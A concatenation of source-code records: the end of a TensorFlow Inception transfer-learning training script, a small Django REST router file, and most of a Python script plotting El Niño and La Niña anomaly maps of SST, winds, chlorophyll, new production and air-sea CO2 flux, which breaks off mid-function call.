tf.random_crop(precropped_image_3d, [MODEL_INPUT_HEIGHT, MODEL_INPUT_WIDTH, MODEL_INPUT_DEPTH])\n\n if flip_left_right:\n flipped_image = tf.image.random_flip_left_right(cropped_image)\n else:\n flipped_image = cropped_image\n\n brightness_min = 1.0 - (random_brightness / 100.0)\n brightness_max = 1.0 + (random_brightness / 100.0)\n brightness_value = tf.random_uniform(tensor_shape.scalar(),\n minval=brightness_min,\n maxval=brightness_max)\n brightened_image = tf.multiply(flipped_image, brightness_value)\n distort_result = tf.expand_dims(brightened_image, 0, name='DistortResult')\n return jpeg_data, distort_result\n\n\ndef variable_summaries(var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\n\ndef main(_):\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n\n detect_devices()\n\n # Set up the pre-trained graph.\n download_inception_v3()\n\n inception_graph, bottleneck_tensor, jpeg_data_tensor, resized_image_tensor = (create_inception_graph())\n image_lists = load_images(FLAGS.image_dir, FLAGS.testing_percentage, FLAGS.validation_percentage)\n class_count = len(image_lists.keys())\n\n if class_count == 0:\n logger.info('No valid folders of images found at ' + FLAGS.image_dir)\n return -1\n if class_count == 1:\n logger.info('Only one valid folder of images found at ' + FLAGS.image_dir +\n ' - multiple classes are needed for classification.')\n return -1\n\n # Check if distortions should be applied.\n distort_image_enabled = distort_images(FLAGS.flip_left_right, FLAGS.random_crop, FLAGS.random_scale, FLAGS.random_brightness)\n logger.info(\"Apply distortions: {}\".format(distort_image_enabled))\n\n with tf.Session(graph = inception_graph) as sess:\n\n if distort_image_enabled:\n # Create distortions\n (distorted_jpeg_data_tensor, distorted_image_tensor) = add_input_distortions(FLAGS.flip_left_right,\n FLAGS.random_crop,\n FLAGS.random_scale,\n FLAGS.random_brightness)\n else:\n # Determine and cache bottleneck images\n determine_and_cache_bottlenecks(sess, image_lists, FLAGS.image_dir, FLAGS.bottleneck_dir, jpeg_data_tensor, bottleneck_tensor)\n\n # Add new layer to train\n (train_step, cross_entropy, bottleneck_input, ground_truth_input, final_tensor) = add_new_layer(\n len(image_lists.keys()), FLAGS.final_tensor_name, bottleneck_tensor)\n\n # Add evaluation the new layer\n evaluation_step, prediction = add_evaluation_step(final_tensor, ground_truth_input)\n\n # Write down summaries\n merged = tf.summary.merge_all()\n\n logger.info(\"Writing down train summary at {}\".format(FLAGS.summaries_dir + '/train'))\n train_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/train', sess.graph)\n\n logger.info(\"Writing down validation summary at {}\".format(FLAGS.summaries_dir + '/validation'))\n validation_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/validation')\n\n # Init weights\n sess.run(tf.global_variables_initializer())\n\n # Init simple output file\n if os.path.exists(outputFilePath):\n os.remove(outputFilePath)\n\n outputFile = open(outputFilePath, \"w\")\n outputFile.write(\"step,train_accuracy,cross_entropy,validation_accuracy\\n\")\n\n # TRAIN USING THE REQUIRED STEPS QUANTITY\n logger.info(\"Training using {} steps\".format(FLAGS.training_steps))\n for i in range(FLAGS.training_steps):\n if distort_image_enabled:\n (train_bottlenecks, train_ground_truth) = get_random_distorted_bottlenecks(\n sess, image_lists, FLAGS.train_batch_size, 'training',\n FLAGS.image_dir, distorted_jpeg_data_tensor,\n distorted_image_tensor, resized_image_tensor, bottleneck_tensor)\n else:\n (train_bottlenecks, train_ground_truth, _) = get_random_cached_bottlenecks(\n sess, image_lists, FLAGS.train_batch_size, 'training',\n FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor,\n bottleneck_tensor)\n\n train_summary, _ = sess.run([merged, train_step], feed_dict={bottleneck_input: train_bottlenecks,\n ground_truth_input: train_ground_truth})\n train_writer.add_summary(train_summary, i)\n\n train_accuracy, cross_entropy_value = sess.run([evaluation_step, cross_entropy],\n feed_dict={bottleneck_input: train_bottlenecks,\n ground_truth_input: train_ground_truth})\n\n logger.info('Step %d: Train accuracy = %.1f%%' % (i, train_accuracy * 100))\n logger.info('Step %d: Cross entropy = %f' % (i, cross_entropy_value))\n\n validation_bottlenecks, validation_ground_truth, _ = (\n get_random_cached_bottlenecks(sess, image_lists, FLAGS.validation_batch_size, 'validation',\n FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor, bottleneck_tensor)\n )\n\n validation_summary, validation_accuracy = sess.run([merged, evaluation_step], feed_dict={bottleneck_input: validation_bottlenecks,\n ground_truth_input: validation_ground_truth})\n validation_writer.add_summary(validation_summary, i)\n\n outputFile.write(\"{},{},{},{}\\n\".format(i, train_accuracy, cross_entropy_value, validation_accuracy))\n logger.info('Step %d: Validation accuracy = %.1f%% (N=%d)' % (i, validation_accuracy * 100, len(validation_bottlenecks)))\n logger.info('==============================================================')\n\n\n # TRAINING COMPLETE\n\n outputFile.close()\n\n # Run evaluation with some new images not used before.\n logger.info(\"Training complete. Running evaluation using {} new images\".format(FLAGS.test_batch_size))\n test_bottlenecks, test_ground_truth, test_filenames = (\n get_random_cached_bottlenecks(sess, image_lists, FLAGS.test_batch_size, 'testing', FLAGS.bottleneck_dir,\n FLAGS.image_dir, jpeg_data_tensor, bottleneck_tensor))\n\n test_accuracy, predictions = sess.run( [evaluation_step, prediction], feed_dict={bottleneck_input: test_bottlenecks, ground_truth_input: test_ground_truth})\n logger.info('Final test accuracy = %.1f%% (N=%d)' % (test_accuracy * 100, len(test_bottlenecks)))\n\n if FLAGS.print_misclassified_test_images:\n logger.info('=== MISCLASSIFIED TEST IMAGES ===')\n for i, test_filename in enumerate(test_filenames):\n if predictions[i] != test_ground_truth[i].argmax():\n logger.info('%70s %s' % (test_filename, list(image_lists.keys())[predictions[i]]))\n\n # Write out the trained graph and labels with the weights stored as constants.\n\n logger.info(\"Writing final model\")\n output_graph_def = graph_util.convert_variables_to_constants(sess, inception_graph.as_graph_def(), [FLAGS.final_tensor_name])\n\n with gfile.FastGFile(FLAGS.output_graph, 'wb') as f:\n f.write(output_graph_def.SerializeToString())\n\n with gfile.FastGFile(FLAGS.output_labels, 'w') as f:\n f.write('\\n'.join(image_lists.keys()) + '\\n')\n\n logger.info(\"FINISHED\")\n\n\ndef add_arg_param(parser, option, type, default, help, action=None):\n if action is not None:\n if type is not None:\n parser.add_argument(\n option,\n type=type,\n default=default,\n help=help,\n action=action\n )\n else:\n parser.add_argument(\n option,\n default=default,\n help=help,\n action=action\n )\n else:\n if type is not None:\n parser.add_argument(\n option,\n type=type,\n default=default,\n help=help\n )\n else:\n parser.add_argument(\n option,\n default=default,\n help=help\n )\n\n\nif __name__ == '__main__':\n # COMMAND LINE PARAMETERS PARSER\n parser = argparse.ArgumentParser()\n add_arg_param(parser, '--image_dir', str, '', 'Path to folders of labeled images.')\n add_arg_param(parser, '--output_graph', str, 'tf_files/output_graph.pb', 'Where to save the trained graph.')\n add_arg_param(parser, '--output_labels', str, 'tf_files/output_labels.txt', 'Where to save the trained graph\\'s labels.')\n add_arg_param(parser, '--summaries_dir', str, 'tf_files/retrain_logs', 'Where to save summary logs for TensorBoard.')\n add_arg_param(parser, '--training_steps', int, 4000, 'How many training steps to run before ending.')\n add_arg_param(parser, '--learning_rate', float, 0.01, 'How large a learning rate to use when training.')\n add_arg_param(parser, '--testing_percentage', int, 10, 'What percentage of images to use as a test set.')\n add_arg_param(parser, '--validation_percentage', int, 10, 'What percentage of images to use as a validation set.')\n add_arg_param(parser, '--eval_step_interval', int, 10, 'How often to evaluate the training results.')\n add_arg_param(parser, '--train_batch_size', int, 100, 'How many images to train on at a time.')\n add_arg_param(parser, '--test_batch_size', int, -1, \"\"\"\\\n How many images to test on. This test set is only used once, to evaluate\n the final accuracy of the model after training completes.\n A value of -1 causes the entire test set to be used, which leads to more\n stable results across runs.\\\n \"\"\")\n add_arg_param(parser, '--validation_batch_size', int, 100, \"\"\"\\\n How many images to use in an evaluation batch. This validation set is\n used much more often than the test set, and is an early indicator of how\n accurate the model is during training.\n A value of -1 causes the entire validation set to be used, which leads to\n more stable results across training iterations, but may be slower on large\n training sets.\\\n \"\"\")\n add_arg_param(parser, '--print_misclassified_test_images', None, False, \"Whether to print out a list of all misclassified test images.\", 'store_true')\n add_arg_param(parser, '--model_dir', str, '/tmp/imagenet', \"\"\"\\\n Path to classify_image_graph_def.pb,\n imagenet_synset_to_human_label_map.txt, and\n imagenet_2012_challenge_label_map_proto.pbtxt.\\\n \"\"\")\n add_arg_param(parser, '--bottleneck_dir', str, './tf_files/bottleneck', 'Path to cache bottleneck layer values as files.')\n add_arg_param(parser, '--final_tensor_name', str, 'final_result', \"The name of the output classification layer in the retrained graph.\")\n add_arg_param(parser, '--flip_left_right', None, False, \"Whether to randomly flip half of the training images horizontally.\", 'store_true')\n add_arg_param(parser, '--random_crop', int, 0, \"A percentage determining how much of a margin to randomly crop off the training images.\")\n add_arg_param(parser, '--random_scale', int, 0, \"A percentage determining how much to randomly scale up the size of the training images by.\")\n add_arg_param(parser, '--random_brightness', int, 0, \"A percentage determining how much to randomly multiply the training image input pixels up or down by.\")\n\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"nacho270/convolutional-sex-detector","sub_path":"convolution/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":34894,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"20797795572","text":"from django.conf import settings\nfrom rest_framework.routers import DefaultRouter, SimpleRouter\n\nfrom .viewsets import UserViewSet\n\nurlpatterns = []\n\nif settings.DEBUG:\n router = DefaultRouter()\nelse:\n router = SimpleRouter()\n\nrouter.register(\"users\", UserViewSet, basename=\"users\")\n\nurlpatterns += router.urls\n","repo_name":"djangoflow/demo-django","sub_path":"src/apps/accounts/drf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"40331924660","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 1 10:40:28 2020\n@author: Nic Pittman\n\nThis code will reproduce Figure 4 in Pittman et al., 2021. \n\nTrends and pvalues are calculated on the fly and not saved anywhere, however could be done easily. \nregridded data is required for this process\n\nThis results in a slower script but works well. All of the processing occurs in the main function.\nEasy to call modified version of this figure.\n\nProduces mean, trend and pval (Stipples) for the following:\n \n figs/Figure4_Spatial_map_update_'+ratio.name+'.png\n \n air-sea flux\n new production \n difference is calculated here\n SST\n TPCA chlorophyll (regridded) \n carbon (as processed into grams)\n \nRequires: \n datasets/co2/landschutzer_co2/spco2_MPI-SOM_FFN_v2020.nc\n processed/seamask.nc\n processed/flux/fratios.nc\n \n processed/flux/avg_npp_rg_cafe.nc'\n processed/flux/tpca.nc\n datasets/sst/sst.mnmean.nc\n processed/flux/pco2grams.nc\n\"\"\"\n \nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport matplotlib.pyplot as plt\nfrom carbon_math import *\nfrom mpl_toolkits.basemap import Basemap\nfrom scipy.stats import linregress\nfrom scipy.stats import ttest_ind, ttest_rel\n#from windspharm.xarray import VectorWind\nimport matplotlib\n\nclass OOMFormatter(matplotlib.ticker.ScalarFormatter):\n def __init__(self, order=0, fformat=\"%1.1f\", offset=True, mathText=True):\n self.oom = order\n self.fformat = fformat\n matplotlib.ticker.ScalarFormatter.__init__(self,useOffset=offset,useMathText=mathText)\n def _set_order_of_magnitude(self):\n self.orderOfMagnitude = self.oom\n def _set_format(self, vmin=None, vmax=None):\n self.format = self.fformat\n if self._useMathText:\n self.format = r'$\\mathdefault{%s}$' % self.format\n\n\n\n\ndef plot_basemap():\n m = Basemap(llcrnrlon=120.,llcrnrlat=-15,urcrnrlon=290,urcrnrlat=15.01,\n resolution='l',projection='merc',fix_aspect=False)\n m.drawcoastlines()\n m.fillcontinents()\n # draw parallels # labels = [left,right,top,bottom]\n m.drawparallels(np.arange(-20,21,10),labels=[1,0,1,1],fontsize=12,latmax=20)\n m.drawmeridians(np.arange(-180,180,30),labels=[0,0,0,1],fontsize=12)\n return m\n\n\n\ndef plot_basemap_row(fig,\n axn,\n hovmol,\n mean,\n units,\n title,\n levs=None,\n\n trend_conversion=None,\n sb1=7,\n sb2=3,\n cmap='viridis',\n cmaptr='RdBu_r',\n wu=None,wv=None,\n wu_all=None,wv_all=None):\n '''\n Create a plotting function to make it repeatable and nicer\n colormaps should either be viridis or RdBu_r\n axis (number) will be 1,3,5,7 (plots both avg and trend at once)\n \n Unfortunately this function does the processing of mean, trends and pvals on the fly.\n Could save these if needed, but not provided here. \n '''\n fr=0.03\n fs=12\n ms=10\n startday=np.datetime64('2000-01-01')\n \n if title.endswith('pCO2t'):\n endday=np.datetime64('2016-12-01') \n print(title)\n elif title.endswith('chlorophyll'):\n endday=np.datetime64('2017-12-01')\n else:\n endday=np.datetime64('2020-01-01') \n \n hovmol=hovmol.sel(time=slice(startday,endday))\n if wu is not None:\n wu=wu.sel(time=slice(startday,endday))\n wv=wv.sel(time=slice(startday,endday))\n wu_all=wu_all.sel(time=slice(startday,endday))\n wv_all=wv_all.sel(time=slice(startday,endday))\n \n ax1=fig.add_subplot(sb1,sb2,axn)\n m=plot_basemap()\n\n \n lo,la=np.meshgrid(hovmol.lon.values,hovmol.lat.values)\n lo1,la1=m(lo,la)\n \n if type(levs)==type(None):\n f=m.contourf(lo1,la1,hovmol.mean(dim='time')-mean.mean(dim='time'),cmap=cmap,extend='both') #11 colors\n #Quick anti-aliasing fix as per: https://stackoverflow.com/questions/15822159/aliasing-when-saving-matplotlib-filled-contour-plot-to-pdf-or-eps\n for c in f.collections:\n c.set_edgecolor(\"face\")\n else:\n if title=='TPCA Chlorophyll':\n f=m.contourf(lo1,la1,hovmol.mean(dim='time')-mean.mean(dim='time'),extend='both',cmap=cmap,levels=levs) #11 colors\n #Quick anti-aliasing fix as per: https://stackoverflow.com/questions/15822159/aliasing-when-saving-matplotlib-filled-contour-plot-to-pdf-or-eps\n for c in f.collections:\n c.set_edgecolor(\"face\")\n else:\n \n f=m.contourf(lo1,la1,hovmol.mean(dim='time')-mean.mean(dim='time'),cmap=cmap,levels=levs,extend='both') #11 colors\n #Quick anti-aliasing fix as per: https://stackoverflow.com/questions/15822159/aliasing-when-saving-matplotlib-filled-contour-plot-to-pdf-or-eps\n for c in f.collections:\n c.set_edgecolor(\"face\")\n ax1.axhline(0,c='k',linestyle=':')\n\n moorings=[165,190,205,220,235,250]\n for x in moorings:\n x1,y1=m(x,0)\n ax1.plot(x1,y1,marker='x',c='k',markersize=ms)\n \n if title=='SST':\n \n \n meansst=hovmol.mean(dim='time')#.where(co2.seamask==1)\n m.contour(lo1,la1,meansst,levels=[28.5],linestyles='solid',colors='k')\n m.contour(lo1,la1,meansst,levels=[25],linestyles='dashed',colors='k')\n \n \n \n #LETS do a t-test to see if they where there is significant differnces\n \n anom=np.concatenate(hovmol.T)\n mean=np.concatenate(mean.T)\n \n pv=[]\n for i in range(anom.shape[0]):\n #print(xx[i,:])\n stat=ttest_ind(anom[i],mean[i],nan_policy='omit')#linregress(time,xx[i,:])\n #print(stat)\n #tr.append(stat.slope*365)\n pv.append(stat.pvalue)\n \n pv=np.array(pv).reshape(len(hovmol.lon),len(hovmol.lat)).T\n \n hh=hovmol.copy()\n hh=hh.drop('time')\n hh['pval']=(['lat','lon'],pv)\n\n ####No windspeed vectors now\n #pass\n\n \n\n # if title=='Wind divergence': \n # windFmt = matplotlib.ticker.ScalarFormatter(useMathText=True)\n # windFmt.set_powerlimits((0, 0))\n # cnt=m.contourf(lo1,la1,hh.pval,colors='none',hatches=['.'],levels=[0,0.05])\n # #Quick anti-aliasing fix as per: https://stackoverflow.com/questions/15822159/aliasing-when-saving-matplotlib-filled-contour-plot-to-pdf-or-eps\n # for c in cnt.collections:\n # c.set_edgecolor(\"face\")\n # elif title=='Wind divergence and direction': \n\n if title=='Wind speed and direction':\n\n lo2,la2=np.meshgrid(wu.lon.values,wu.lat.values)\n lo2a,la2a=m(lo2,la2)\n \n skip=(slice(None,None,5),slice(None,None,5)) #2 for NCEP 2\n qu=m.quiver(lo2a[skip],\n la2a[skip],\n (wu.mean(dim='time')-wu_all.mean(dim='time'))[skip],\n (wv.mean(dim='time')-wv_all.mean(dim='time'))[skip],\n scale=17,headaxislength=4,headlength=5,headwidth=5)\n #x,y=m(-10,150)\n #ax1.quiverkey(qu,label='Wind direction m/s',labelpos='S',U=1,X=150,Y=-10)\n if axn!=6:\n plt.quiverkey(qu,1.3,1.028,U=1,label='Wind speed 5m s$^{-1}$')\n \n else:\n #windFmt=None\n cnt=m.contourf(lo1,la1,hh.pval,colors='none',hatches=['.'],levels=[0,0.05])\n #Quick anti-aliasing fix as per: https://stackoverflow.com/questions/15822159/aliasing-when-saving-matplotlib-filled-contour-plot-to-pdf-or-eps\n for c in cnt.collections:\n c.set_edgecolor(\"face\")\n\n\n \n cb=plt.colorbar(f,ax=ax1,fraction=fr,extend='both')\n\n cb.set_label(units,fontsize=fs)\n cb.ax.tick_params(labelsize=fs-1)\n\n \n if axn==1:\n name='EP Events'\n elif axn==2:\n name='CP Events'\n elif axn==3:\n name='La Nina Events'\n if axn<=3:\n ax1.set_title(name+'\\n'+chr(ord('`')+axn)+') Anomaly: '+title,fontsize=fs)\n else:\n ax1.set_title(chr(ord('`')+axn)+') Anomaly: '+title,fontsize=fs)\n \n ax1.tick_params(labelsize=fs)\n\n #Trends\n \n #hovmol=hovmol.where(hovmol!=-0.9999,np.nan)\n #hm=hovmol.interpolate_na(dim='time').sel(time=slice(startday,endday))\n #months=hm.time\n \n #dt_dates=pd.to_numeric(months.values.astype('datetime64[D]'))\n #num_dates=dt_dates\n #hm['time']=num_dates\n\n \n\n\n \n\n\n#Functions above make plotting easy.\n# # Code begins\n \n# %%Load data in\n \n#landsch_fp='datasets/co2/landschutzer_co2/spco2_MPI_SOM-FFN_v2018.nc'\nlandsch_fp='datasets/co2/landschutzer_co2/spco2_MPI-SOM_FFN_v2020.nc'\n\n\n\nseamask=xr.open_dataset('processed/seamask.nc') #Because 2020 version doesn't have it.\nseamask= seamask.assign_coords(lon=(seamask.lon % 360)).roll(lon=(seamask.dims['lon']),roll_coords=False).sortby('lon')\t\n\n#It would be preferable to use the 2020 version,\n# landsch_fp='datasets/co2/landschutzer_co2/spco2_MPI-SOM_FFN_v2020.nc'\n#However it doesn't include seamask so we are going to need both.... (Unless I save the seamask)\nlandschutzer=xr.open_dataset(landsch_fp)\nlandschutzer= landschutzer.assign_coords(lon=(landschutzer.lon % 360)).roll(lon=(landschutzer.dims['lon']),roll_coords=False).sortby('lon')\t\t#EPIC 1 line fix for the dateline problem.\nland_pac=landschutzer.sel(lon=slice(120,290),lat=slice(-20,20))\nland_pac['time']=land_pac.time.astype('datetime64[M]')\nland_pac_all=landschutzer.sel(lon=slice(120,290),lat=slice(-20,20))\n\nland_pac=land_pac.fgco2_smoothed\n\natmco2=land_pac_all.atm_co2\ndco2=land_pac_all.dco2\npco2=land_pac_all.spco2_smoothed\nkw=land_pac_all.kw\n\nf_ratios=xr.open_mfdataset('processed/flux/fratios.nc')\nratio=f_ratios.laws2011a#laws2000#laws2000,laws2011a,laws2011b,henson2011\n\nnpp1=xr.open_dataset('processed/flux/avg_npp_rg_cafe.nc')\navg_npp=(npp1.avg_npp/12)*ratio\n\nland=(land_pac*1000)/365 #LANDSCHUTZ\n\n\ndiff=land-avg_npp\ndiff1=diff.where((diff<0.1)|(diff<-0.1),np.nan)\n\n\n# Need to combine the chlorophyll products, takes a bit of memory.\nchl=xr.open_dataset('processed/flux/tpca.nc').tpca#'sw_month.nc')\n\n#mod=xr.open_dataset('datasets/tpca/mod_month.nc')\nchl['time']=chl.time.astype('datetime64[M]')\nchl=chl.interpolate_na(dim='time')\n#mod['time']=mod.time.astype('datetime64[M]')\n#tpca=sw\n#tpca=tpca.merge(mod)\n#chl = tpca.to_array(dim='tpca').mean('tpca')\n\n#SST\nsst = xr.open_dataset('datasets/sst/sst.mnmean.nc')\nsst= sst.assign_coords(lon=(sst.lon % 360)).roll(lon=(sst.dims['lon']),roll_coords=False).sortby('lon')\t\t#EPIC 1 line fix for the dateline problem.\nsst=sst.sel(lon=slice(120,290),lat=slice(20,-20)).sst\nsst=sst.where(seamask.seamask==1)\n\npCO2 = xr.open_dataarray('processed/flux/pco2grams.nc') #_norm\nintegratedpCO2 = (pCO2*12*50)\n\n#NCEP2 winds\n#wu=xr.open_dataset('datasets/uwnd.10m.mon.mean.nc').sel(level=10).uwnd\n#wv=xr.open_dataset('datasets/vwnd.10m.mon.mean.nc').sel(level=10).vwnd\n#ws=np.sqrt((wu**2)+(wv**2))\n#ws=ws.sel(lat=slice(20,-20),lon=slice(120,290),time=slice('1997-07-01','2020-01-01'))\n\nws_ccmp=xr.open_dataset('processed/CCMP_ws_1deg_global.nc')\nwu=ws_ccmp.uwnd\nwv=ws_ccmp.vwnd\n\n# %% Test Horizontal Divergence\n#w = VectorWind(wu, wv)\n#spd = w.magnitude()\n#divergence = w.divergence().sel(lat=slice(20,-20),lon=slice(120,290),time=slice('1997-07-01','2020-01-01'))\n#div.mean(dim='time').plot()\n\nwu=wu.sel(lat=slice(-20,20),lon=slice(120,290),time=slice('1997-07-01','2020-01-01'))\nwv=wv.sel(lat=slice(-20,20),lon=slice(120,290),time=slice('1997-07-01','2020-01-01'))\n\n\n\n# # THIS NEEDS TO BE RUN ONCE BUT CAN be memory intensive. In own file. \n\n# w_ccmp_a=xr.open_mfdataset('datasets/ws_ccmp/*.nc') #Downloaded manually\n# w_ccmp_a['time']=w_ccmp_a.time.astype('datetime64[M]')\n# w_ccmp_a=w_ccmp_a.sel(latitude=slice(-20,20))\n\n# w_ccmp_b=xr.open_mfdataset('datasets/CCMP_winds.nc') #Bulk ErDap download\n# dt=w_ccmp_b.indexes['time'].to_datetimeindex()\n# w_ccmp_b['time']=dt\n\n# w_ccmp=xr.merge([w_ccmp_b,w_ccmp_a])\n\n\n# w_ccmp=w_ccmp.sel(longitude=slice(120,290),latitude=slice(-20,20))\n# ws_ccmp=np.sqrt((w_ccmp.uwnd**2)+(w_ccmp.vwnd**2))\n# ws_ccmp=ws_ccmp.rename({'latitude':'lat','longitude':'lon'})\n# try:\n# ws_ccmp.to_netcdf('datasets/CCMP_windspeed.nc')\n# print('saved')\n# except:\n# pass\n\n#ws_ccmp=xr.open_dataarray('processed/CCMP_ws_1deg.nc')\n\n# %% Prepare Figure \n\n\nlanina=pd.read_csv('processed/indexes/la_nina_events.csv')\ncp_nino=pd.read_csv('processed/indexes/cp_events.csv')\nep_nino=pd.read_csv('processed/indexes/ep_events.csv')\n\nfp='processed/combined_dataset/month_data_exports.nc'\ninfo=xr.open_mfdataset(fp).sel(Mooring=195).to_dataframe()\n\n\n#Process EP, CP and Nino events.\nnina=pd.DataFrame()\nep=pd.DataFrame()\ncp=pd.DataFrame()\nfor i in lanina.iterrows(): nina=nina.append(info[slice(i[1].start,i[1].end)])\nfor i in ep_nino.iterrows(): ep=ep.append(info[slice(i[1].start,i[1].end)])\nfor i in cp_nino.iterrows(): cp=cp.append(info[slice(i[1].start,i[1].end)])\nnina_dates=nina.index\nep_dates=ep.index[4:]\ncp_dates=cp.index\n#all_dates=chl.time\nall_dates=info.index[8:]#[36:] #2000 - 2020\nold_all_dates=all_dates\nneutral=all_dates.drop(cp_dates).drop(nina_dates).drop(ep_dates)\nall_dates=neutral\nfig=plt.figure(figsize=(19*2/2.54,23*2/2.54))#(figsize=(30,15))\nsb1=7\nsb2=3\n\n\nsst_range=np.arange(-2.5,2.75,0.25)\nws_range=np.arange(-2,2.2,0.2)\nchl_range=np.arange(-0.1,0.11,0.01)\nnpp_range=np.arange(-2.75,3,0.25)#None#np.arange(-0.04,0.0425,0.0025)\nprecip_range=np.arange(-6,7,1)\ndco2_range=np.arange(-45,50,5)\nco2_range=npp_range#None#np.arange(-0.04,0.045,0.005)\n\n\n\n#%% EP\n\n\n\n\nplot_basemap_row(fig,axn=1,\n hovmol=sst.sel(time=ep_dates,method='nearest'),\n mean=sst.sel(time=all_dates,method='nearest'),\n units='Degrees C',\n title='SST',\n levs=sst_range,\n \n cmap='RdBu_r')\n\n\n\nplot_basemap_row(fig,axn=4,\n hovmol=ws_ccmp.wspd.sel(time=ep_dates,method='nearest'),\n mean=ws_ccmp.wspd.sel(time=all_dates,method='nearest'),\n units='m s$^{-1}$',\n title='Wind speed and direction', \n levs=ws_range, \n wu=wu.sel(time=ep_dates,method='nearest'),\n wv=wv.sel(time=ep_dates,method='nearest'),\n wv_all=wv.sel(time=all_dates,method='nearest'),\n wu_all=wu.sel(time=all_dates,method='nearest'),\n cmap='RdBu_r')\n\n# plot_basemap_row(fig,axn=7,\n# hovmol=divergence.sel(time=ep_dates,method='nearest'),\n# mean=divergence.sel(time=all_dates,method='nearest'),\n# units='m s$^{-1}$',\n# title='Wind divergence', \n# levs=np.arange(-6*10**-6,6.1*10**-6,0.5*10**-6),\n# wu=wu.sel(time=ep_dates,method='nearest'),\n# wv=wv.sel(time=ep_dates,method='nearest'),\n# wv_all=wv.sel(time=all_dates,method='nearest'),\n# wu_all=wu.sel(time=all_dates,method='nearest'),\n# cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=7,\n hovmol=chl.sel(time=ep_dates,method='nearest'),\n mean=chl.sel(time=all_dates,method='nearest'),\n units='mg chl m$^{-3}$',\n title='TPCA chlorophyll',\n levs=chl_range,\n \n trend_conversion=1000,\n cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=10,\n hovmol=avg_npp.sel(lat=slice(-15,15)).sel(time=ep_dates,method='nearest'),\n mean=avg_npp.sel(lat=slice(-15,15)).sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='New production',\n \n levs=npp_range,\n \n #trend_conversion=1000,\n cmap='RdBu_r')\n\n# plot_basemap_row(fig,axn=13,\n# hovmol=precip.sel(time=ep_dates,method='nearest'),\n# mean=precip.sel(time=all_dates,method='nearest'),\n# units='mm day$^{-1}$',\n# title='Precipitation',\n \n# levs=precip_range,\n\n# cmap='RdBu_r')\n\n\n#Delta pCO2\nh=plot_basemap_row(fig,axn=13,\n hovmol=dco2.sel(time=ep_dates,method='nearest'),#npp1.avg_npp,#dco2,#integratedpCO2,#monthlyPCO2*1000,\n mean=dco2.sel(time=all_dates,method='nearest'),\n units='μatm',\n title='\\u0394pCO$_{2}$',#'pCO21',\n \n levs=dco2_range,#(200,1200,10),#(5.5,9.5,0.5),\n \n cmap='RdBu_r')\n\nplot_basemap_row(fig,axn=16,\n hovmol=land.sel(time=ep_dates,method='nearest'),\n mean=land.sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='Air-sea CO$_{2}$ flux',\n \n levs=co2_range,\n\n cmap='RdBu_r')\n\n\n# %% CP\n\nplot_basemap_row(fig,axn=2,\n hovmol=sst.sel(time=cp_dates,method='nearest'),\n mean=sst.sel(time=all_dates,method='nearest'),\n units='Degrees C',\n title='SST',\n levs=sst_range,#np.arange(20,32,1),\n \n cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=5,\n hovmol=ws_ccmp.wspd.sel(time=cp_dates,method='nearest'),\n mean=ws_ccmp.wspd.sel(time=all_dates,method='nearest'),\n units='m s$^{-1}$',\n title='Wind speed and direction', \n levs=ws_range,#p.arange(0,11,1),\n wu=wu.sel(time=cp_dates,method='nearest'),\n wv=wv.sel(time=cp_dates,method='nearest'),\n wv_all=wv.sel(time=all_dates,method='nearest'),\n wu_all=wu.sel(time=all_dates,method='nearest'),\n cmap='RdBu_r')\n\n\n# plot_basemap_row(fig,axn=8,\n# hovmol=divergence.sel(time=cp_dates,method='nearest'),\n# mean=divergence.sel(time=all_dates,method='nearest'),\n# units='m s$^{-1}$',\n# title='Wind divergence', \n# levs=np.arange(-6*10**-6,6.1*10**-6,0.5*10**-6),##p.arange(0,11,1),\n# wu=wu.sel(time=cp_dates,method='nearest'),\n# wv=wv.sel(time=cp_dates,method='nearest'),\n# wv_all=wv.sel(time=all_dates,method='nearest'),\n# wu_all=wu.sel(time=all_dates,method='nearest'),\n# cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=8,\n hovmol=chl.sel(time=cp_dates,method='nearest'),\n mean=chl.sel(time=all_dates,method='nearest'),\n units='mg chl m$^{-3}$',\n title='TPCA chlorophyll',\n levs=chl_range,\n \n cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=11,\n hovmol=avg_npp.sel(lat=slice(-15,15)).sel(time=cp_dates,method='nearest'),\n mean=avg_npp.sel(lat=slice(-15,15)).sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='New production',\n levs=npp_range,\n\n cmap='RdBu_r')\n\n# plot_basemap_row(fig,axn=14,\n# hovmol=precip.sel(time=cp_dates,method='nearest'),\n# mean=precip.sel(time=all_dates,method='nearest'),\n# units='mm day$^{-1}$',\n# title='Precipitation',\n# levs=precip_range,\n\n# cmap='RdBu_r')\n\n\n#Delta pCO2\nh=plot_basemap_row(fig,axn=14,\n 